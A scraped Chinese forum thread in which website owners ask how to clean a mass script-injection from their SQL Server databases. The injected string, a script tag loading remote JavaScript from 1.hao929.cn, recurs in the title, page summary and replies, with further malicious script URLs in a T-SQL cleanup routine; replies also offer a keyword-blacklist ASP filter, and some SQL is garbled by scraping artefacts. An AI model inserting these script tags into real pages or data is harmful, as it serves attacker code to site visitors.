数据库被注入代码怎么解决?</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!-- 20分,无满意结帖,结帖人chinabs]

发布时间:2017-2-27 3:26:56 编辑:www.fx114.net 分享查询网我要评论
本篇文章主要介绍了"数据库被注入代码怎么解决?</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!-- 20分,无满意结帖,结帖人chinabs]",主要涉及到数据库被注入代码怎么解决?</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!-- 20分,无满意结帖,结帖人chinabs]方面的内容,对于数据库被注入代码怎么解决?</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!-- 20分,无满意结帖,结帖人chinabs]感兴趣的同学可以参考一下。

数据库被注入代码怎么解决:</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--

这个帖子见了好几次了。

支持 。也正为这个苦恼

加我QQ:961801708,我刚解决了自己公司的网站,呵呵。

select 'update ' + b.[name] + ' set ' + a.[name] + '=replace(' + a.[name] + ',''</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--'','''')'  from syscolumns as a,sysobjects as b where a.[id]=b.[id] and b.xtype='U'  and a.xtype in ('231','35','99','167','175') order by b.[name]

可以临时解决问题,但不是根本之道。郁闷

真的非常感谢3楼的朋友帮我的网站解决了这个问题

楼上的朋友,我也碰到同样的情况,您知道是怎么处理的吗?

我也是啊,希望楼主把方法说一下,大家共享!

不是楼主了,是解决了问题的,期待

同样的问题,哪些黑客真可恨!

我的站 昨天中午被注入了,下午恢复了一下数据库,晚上又被注入了,怎么解决呀!  是服务器问题还是程序漏洞呀!!!  把这个问题顶起来吧

同样的问题,期待中。3楼的朋友能不能把方法公布一下,感激不尽。

方法公布下,谢谢

前阵子也遇到这种情况,目前已经解决了. 结合IIS日志,查遍服务器上程序,最终发现还是程序上的漏洞..完善防SQL注入的代码.对于GET和POST方式分别进行防注入处理...在有表单提交的程序中,完善字符替换.

我也遇到了这个问题,我的解决办法是  1.先停止IIS服务,修改到最低权限  2.停止数据库服务,用Replace替换掉注入的代码,逐一查看你的表  3.修改网站的权限到最低,保留读写的权限  4.我分析是程序漏洞,HK找到了程序的漏洞,并保存了该地址,再不定时的攻击,我只好把后台的路径给修改了,还有前台像提交表单之类的,把敏感的SQL语句都给替换掉  我就做了这些,网站已经5天没有被攻击了  希望这些能帮助你

我也遇到同样的问题

今天早上发现被注入了。3楼兄弟的qq号不让加入啊。

怎么解决啊

引用 14 楼 sue4sw 的回复:前阵子也遇到这种情况,目前已经解决了.  结合IIS日志,查遍服务器上程序,最终发现还是程序上的漏洞..完善防SQL注入的代码.对于GET和POST方式分别进行防注入处理...在有表单提交的程序中,完善字符替换.  加上sql过滤函数。 下面是我常用的sql 过滤字符函数,可供你参考: <% '过滤SQL非法字符并格式化html代码 function Replace_Text(fString) Dim sqlIn,sqlinstr if isnull(fString) then Replace_Text="" exit function Else sqlIn = "and%20|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|or%20" sqlinstr=Split(sqlIn,"|") For m=0 To ubound(sqlinstr)    If InStr(LCase(fString),sqlinstr(m))>0 Then         fString=lcase(trim(fString))    End If  Next fString=replace(fString,"'","‘") fString=replace(fString,";",";") fString=replace(fString,"--","—") fString=replace(fString,"and%20","") fString=replace(fString,"exec","") fString=replace(fString,"insert","") fString=replace(fString,"select","") fString=replace(fString,"delete","") fString=replace(fString,"update","") fString=replace(fString,"and","") fString=replace(fString,"*","") fString=replace(fString,"chr","") fString=replace(fString,"mid","") fString=replace(fString,"master","") fString=replace(fString,"truncate","") fString=replace(fString,"char","") fString=replace(fString,"declare","") fString=replace(fString,"create","") fString=server.htmlencode(fString) fString=replace(fString,"&lt;sup&gt;&lt;small&gt;","<sup><small>") fString=replace(fString,"&lt;/small&gt;&lt;/sup&gt;","</small></sup>") fString=replace(fString,"&lt;sub&gt;&lt;small&gt;","<sub><small>") fString=replace(fString,"&lt;/small&gt;&lt;/sub&gt;","</small></sub>") Replace_Text=fString end if end function  %>

感谢楼上的朋友,我也有做字符替换。 提交数据库用的是ADDNEW方法。 set rs_product = server.CreateObject("adodb.recordset") sql = "SELECT TOP 1 * FROM T_Product" rs_product.open sql,conn,1,3 rs_product.addnew

我没有对内容进行过滤。 但用ADDNEW,不过滤没问题吧?怎么会被人向数据库里注入  </title> </pre>"> <script src=http://1.hao929.cn/ads.js> </script> <!-- dim Picture,Content Picture = request.Form("Picture") Content = request.Form("Content") set rs_product = server.CreateObject("adodb.recordset") sql = "SELECT TOP 1 * FROM T_Product" rs_product.open sql,conn,1,3 rs_product.addnew rs_product("Picture") = Picture rs_product("Content") = Content rs_product.update

过滤也不管用,加我这个号吧562121559,我是三楼的。

这木马与asp页面无关. 解决办法如下: 1.打开mssql企业管理器,将Windows身份验证用户:BUILTIN\Administrators的安全性访问选为:拒绝访问. 2.打开查询分析器,将非法字符串replace掉,本人做了个小代码段,遍历数据库所有的[字符串字段],将定义的字符串去掉,可以为大家效劳一下. /***********定义要去除的字符,请注意,可能不止一条,我的服务器就查到两条************/ declare @delStr nvarchar(500) set @delStr='<script src=http://cn.daxia123.cn/cn.js></script>' --set @delStr='<script src=http://cn.jxmmtv.com/cn.js></script>' /****************************************/ /**********以下为操作实体************/ set nocount on  declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int declare @sql nvarchar(500) set @iResult=0 declare cur cursor for select name,id from sysobjects where xtype='U' open cur fetch next from cur into @tableName,@tbID while @@fetch_status=0 begin    declare cur1 cursor for         --xtype in (231,167,239,175) 为char,varchar,nchar,nvarchar类型         select name from syscolumns where xtype in (231,167,239,175) and [email protected]    open cur1    fetch next from cur1 into @columnName    while @@fetch_status=0    begin       set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace([[email protected]+'],[email protected]+''','''') where [[email protected]+'] like [email protected]+'%'''         exec sp_executesql @sql             set @iRow=@@rowcount       set @[email protected][email protected]       if @iRow>0        begin   print '表:[email protected]+',列:[email protected]+'被更新'+convert(varchar(10),@iRow)+'条记录;'       end             fetch next from cur1 into @columnName    end    close cur1    deallocate cur1        fetch next from cur into @tableName,@tbID end print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!' close cur deallocate cur set nocount off /*****以上为操作实体******/

学习中  mark

不懂,帮顶

UP 

最近我也发现此问题了  做出一下解决  放入瑞星卡卡论坛中 以供大家参考~~! http://bbs.ikaka.com/showtopic-8590418.aspx

学习,   标记,   说不定哪天就能用得上, 

上一篇:sql server 2005处理数据挖掘结构出现错误,求救。。。 100分,无满意结帖,结帖人xfxf20]
下一篇:Microsoft OLE DB Provider for Oracle 不支持 Oracle 数据类型 BLOB 该如何解决? 0guoqiang1983]

相关文章

相关评论

本站评论功能暂时取消,后续此功能例行通知。

一、不得利用本站危害国家安全、泄露国家秘密,不得侵犯国家社会集体的和公民的合法权益,不得利用本站制作、复制和传播不法有害信息!

二、互相尊重,对自己的言论和行为负责。